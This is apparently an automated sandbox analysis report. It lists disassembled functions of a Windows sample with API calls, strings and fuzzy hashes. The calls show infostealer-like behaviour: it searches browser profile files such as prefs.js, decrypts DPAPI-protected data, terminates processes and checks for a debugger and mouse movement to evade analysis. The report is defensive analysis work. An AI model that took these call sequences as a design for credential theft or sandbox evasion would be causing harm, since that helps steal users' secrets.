API String ID: 3967855609-1013718255
Opcode ID: a0bf4905e341e62025ab17bc588bfd7b1010b8c09cdffa1957ccd2ef5fb665c7
Instruction ID: f03315745aba85c95e9a3738e77d3be6ea09e52bfe16b75ee6e065977290399b
Opcode Fuzzy Hash: a0bf4905e341e62025ab17bc588bfd7b1010b8c09cdffa1957ccd2ef5fb665c7
Instruction Fuzzy Hash: 41D1A53294262D9BDF20EB24DD42AED77B4EF49311F4144E1AD4873122DA316F9A8FB1

Function 00D5E5B9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

FindFirstFileA.KERNEL32(?,?,00D88738,00D8796F,?,?,?), ref: 00D5E63A
StrCmpCA.SHLWAPI(?,00D8873C), ref: 00D5E65B
StrCmpCA.SHLWAPI(?,00D88740), ref: 00D5E675
StrCmpCA.SHLWAPI(?,prefs.js,00D88744,?,00D8797D), ref: 00D5E701

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

CopyFileA.KERNEL32(?,?,00000001), ref: 00D5E7DB
DeleteFileA.KERNEL32(?), ref: 00D5E8A6
FindNextFileA.KERNEL32(?,?), ref: 00D5E949
FindClose.KERNEL32(?), ref: 00D5E95D

Strings

prefs.js, xrefs: 00D5E6F5

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 3c3f777ac644248c67325834c25717d6a09afa779bdf2586c9138928de3b123f
Instruction ID: 8becf137365020d9d58628f6cdaa48b0c1a06844e800007fa6edf167d5719fc5
Opcode Fuzzy Hash: 3c3f777ac644248c67325834c25717d6a09afa779bdf2586c9138928de3b123f
Instruction Fuzzy Hash: 24A1E3329406289BCF60FB24DC46BDD7774AF49311F9005A1AD08B7262DA31AF898FB1

Function 00D5C888 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

FindFirstFileA.KERNEL32(?,?,\*.*,00D878C7,?,?,?), ref: 00D5C8E4
StrCmpCA.SHLWAPI(?,00D88604), ref: 00D5C905
StrCmpCA.SHLWAPI(?,00D88608), ref: 00D5C91F

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

CopyFileA.KERNEL32(?,?,00000001), ref: 00D5CD54

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

DeleteFileA.KERNEL32(?), ref: 00D5CDCB

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

FindNextFileA.KERNEL32(?,?), ref: 00D5CE3A
FindClose.KERNEL32(?), ref: 00D5CE4E

Strings

\*.*, xrefs: 00D5C8AE

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2055012574-1173974218
Opcode ID: d0260bf9f2a48388fa066f53a6ffa443e339dc98f27a13aaca83b84327851e1f
Instruction ID: 0d1accef6d6a85858ca86abe8a9eeb75cd0f2df5dc9102b2fe47bc5140db3abd
Opcode Fuzzy Hash: d0260bf9f2a48388fa066f53a6ffa443e339dc98f27a13aaca83b84327851e1f
Instruction Fuzzy Hash: BEE1AF3195452D9BCF20EB21DD46AEDB374EF49305F4140E1A94877222DA35AF8E8FB0

Function 00D5C528 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

FindFirstFileA.KERNEL32(?,?,00D885EC,00D878BB,?,?,?), ref: 00D5C5A0
StrCmpCA.SHLWAPI(?,00D885F0), ref: 00D5C5C1
StrCmpCA.SHLWAPI(?,00D885F4), ref: 00D5C5DB
StrCmpCA.SHLWAPI(?,00D885F8,?,00D878BF), ref: 00D5C668
StrCmpCA.SHLWAPI(?), ref: 00D5C6C9

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D5BB2E: CopyFileA.KERNEL32(?,?,00000001), ref: 00D5BBD3

FindNextFileA.KERNEL32(?,?), ref: 00D5C834
FindClose.KERNEL32(?), ref: 00D5C848

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: ac4ae9ddb997d38254254aea2369ef52e0df55e5efa0442ded98568dcde8a9ce
Instruction ID: 283e40abaa27ed8c42bde6ee7699fb857c95cfe40841d33e3dbecbe144a4abe2
Opcode Fuzzy Hash: ac4ae9ddb997d38254254aea2369ef52e0df55e5efa0442ded98568dcde8a9ce
Instruction Fuzzy Hash: A281F83290061DABCF61FB34DC46AE977B4EB09311F4506A1AD48A3251EB349F9D8EB1

Function 00D517FD Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00D51813
SetThreadDesktop.USER32(00000000), ref: 00D5181A
GetCursorPos.USER32(?), ref: 00D5182A
Sleep.KERNEL32(000003E8), ref: 00D5183A
GetCursorPos.USER32(?), ref: 00D51849
Sleep.KERNEL32(00002710), ref: 00D5185B
Sleep.KERNEL32(000003E8), ref: 00D51860
GetCursorPos.USER32(?), ref: 00D5186F

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: bd1a24b585ba0dc6421a2a90c13d5acc21a839f3eb580768fc4aa5ea9a871bfa
Instruction ID: b3bdf6ba4e080da779a170d1bc14e643c0d4be1520536f7314630f1444498129
Opcode Fuzzy Hash: bd1a24b585ba0dc6421a2a90c13d5acc21a839f3eb580768fc4aa5ea9a871bfa
Instruction Fuzzy Hash: A911FC35E10209FBDF20DBA4CD89BBE7FB9AB40356F280465DD01E2190D7749A89CB74

Function 00D64452 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D6447E
Process32First.KERNEL32(00000000,00000128), ref: 00D6448E
StrCmpCA.SHLWAPI(?,?), ref: 00D644A7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D644BA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00D644C9
CloseHandle.KERNEL32(00000000), ref: 00D644D0
Process32Next.KERNEL32(00000000,00000128), ref: 00D644DE
CloseHandle.KERNEL32(00000000), ref: 00D644E9

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: c85e70d7525b6fe82527206db695308cb7a2308e0e0238b8f0d7bd60068d286b
Instruction ID: bc1066a9fbd0af3641fa82962c071d37e998dc9db56d351d38e79094120c5cbb
Opcode Fuzzy Hash: c85e70d7525b6fe82527206db695308cb7a2308e0e0238b8f0d7bd60068d286b
Instruction Fuzzy Hash: C3118E31A0121CBBDB619F60DC49BEE7BB8FF45740F004096FA05E2160DB70AA95DB61

Function 00D5B721 Relevance: 9.1, APIs: 6, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D5B75E
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00D5BA30), ref: 00D5B779
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00D5B781
_memmove.LIBCMT ref: 00D5B804
lstrcatA.KERNEL32(00D87883,00D87887,?,00000000,00000000,00000000,00000000,00000014,?,00D5BA30), ref: 00D5B82E
lstrcatA.KERNEL32(00D87883,00D8788A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00D5BA30), ref: 00D5B844

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
String ID:
API String ID: 943939369-0
Opcode ID: 535522a140c53be9359c1c84b86f4bdab36bcd003522db3c7b42c900292bf2ad
Instruction ID: 923102523195a748cb925e4238fbbb3e73319fb5440c866728e9e47da0f61b6d
Opcode Fuzzy Hash: 535522a140c53be9359c1c84b86f4bdab36bcd003522db3c7b42c900292bf2ad
Instruction Fuzzy Hash: 553139B190411EAFDB109B54DD859FEBBBCAF08355F4400B6F80EE2241E7749A889F72

Function 00D643C5 Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00D643CF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D643EE
Process32First.KERNEL32(00000000,00000128), ref: 00D643FE
Process32Next.KERNEL32(00000000,00000128), ref: 00D64410
StrCmpCA.SHLWAPI(?), ref: 00D64422
CloseHandle.KERNEL32(00000000), ref: 00D64436

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: 66a7aedbeb534609ebbd10a2cdd687cb36d001e42160250a81daec5225d474fe
Instruction ID: 2147ce9715e9a5c29a92b0b9e84b85d0437d37684ec7a398c5af767b23fdc8b2
Opcode Fuzzy Hash: 66a7aedbeb534609ebbd10a2cdd687cb36d001e42160250a81daec5225d474fe
Instruction Fuzzy Hash: FE01A43150116CAFDB91AF609C09BDE7ABCAF06700F0480D6E505E2151DA749F85CF70

Function 00D7C94C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00D7CFB5,?,00D79D66,?,000000BC,?), ref: 00D7C98B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00D7CFB5,?,00D79D66,?,000000BC,?), ref: 00D7C9B4
GetACP.KERNEL32(?,?,00D7CFB5,?,00D79D66,?,000000BC,?), ref: 00D7C9C8

Strings

OCP, xrefs: 00D7C96C
ACP, xrefs: 00D7C95B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 024eec6dcea9c34f7f2731d9c5731037658706a85a5cfe4410938d6b4a981b82
Instruction ID: 37e5517f1e1ac242f8c29d474604fccc22aac61028040a65c74be68aeec4cd9e
Opcode Fuzzy Hash: 024eec6dcea9c34f7f2731d9c5731037658706a85a5cfe4410938d6b4a981b82
Instruction Fuzzy Hash: 1701D43661070ABEEB219B61EC05F5F36ACAF4139AF14D01DF609E0181FB60DA418B75

Function 00D6E88C Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00D6ECC4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D6ECD9
UnhandledExceptionFilter.KERNEL32(00D8439C), ref: 00D6ECE4
GetCurrentProcess.KERNEL32(C0000409), ref: 00D6ED00
TerminateProcess.KERNEL32(00000000), ref: 00D6ED07

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6001efde0e87319412deb78b18ac8ebca1e73c2d20769dbb18c1e41e59d4accc
Instruction ID: e025a95da43f254d5385a52c4700d06b4a12319abd8fc9e17b58b79c71eb751f
Opcode Fuzzy Hash: 6001efde0e87319412deb78b18ac8ebca1e73c2d20769dbb18c1e41e59d4accc
Instruction Fuzzy Hash: E22199B9821308DFD740DFA8FD896543FA8BB09300F50891AF908C7760E7B169868FB5

Function 00D592A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00D59456), ref: 00D592C9
LocalAlloc.KERNEL32(00000040,00D59456,?,?,00D59456,?,00D5DC56,?,?,?,?,?,?), ref: 00D592DD
LocalFree.KERNEL32(?,?,?,00D59456,?,00D5DC56,?,?,?,?,?,?), ref: 00D59302

Strings

DPAPI, xrefs: 00D592AE

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
